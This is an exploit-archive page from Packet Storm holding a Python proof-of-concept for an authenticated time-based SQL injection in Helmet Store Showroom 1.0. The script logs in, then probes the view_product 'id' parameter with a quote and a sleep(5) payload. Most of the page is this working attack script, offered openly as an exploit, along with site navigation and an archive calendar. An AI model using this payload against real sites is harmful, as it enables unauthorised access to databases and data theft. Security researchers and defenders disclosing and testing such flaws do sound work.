exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Helmet Store Showroom 1.0 SQL Injection

Helmet Store Showroom 1.0 SQL Injection
Posted Nov 25, 2022
Authored by syad

Helmet Store Showroom version 1.0 suffers from an authenticated remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 3e66b115ba8748f4ad2101302dc9ed47242e049cd2dfe657bde160d836d22cee

Helmet Store Showroom 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection
# Date: 25-11-2022
# Exploit Author: syad
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A

# Description

# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.


import requests
import sys
import pyfiglet
sess = requests.Session()


proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}

def login1(ip,username,password):
x = "http://%s/hss/classes/Login.php?f=login" % ip
login = {'username':username, 'password':password}
r = sess.post(x, data=login, proxies=proxies)
#print(r.content)



def login(ip):
x = ("http://%s/hss/admin") % ip
r = sess.get(x,proxies=proxies)
if "Welcome to Helmet Store Showroom - PHP" in r.text:
print("--------------------------------------------")
print("[+] Success Login")


def detect_sql(ip):
x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip
r = sess.get(x,proxies=proxies)
if "You have an error in your SQL syntax" in r.text:
print("[+] Found SQL Error")


def time_based_sqli(ip):
x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip
r = sess.get(x,proxies=proxies)
print("[+] Time Based SQL Found")
print("[*]!!! Time To Report !!!")






if __name__ == "__main__":
result = pyfiglet.figlet_format("PWN")
print(result)
try:
ip = sys.argv[1].strip()
username = sys.argv[2].strip()
password = sys.argv[3].strip()
except IndexError:
print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])
print("[-] Example: %s 192.168.1.x" % sys.argv[0])
sys.exit(-1)

login1(ip,username,password)
login(ip)
detect_sql(ip)
time_based_sqli(ip)
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close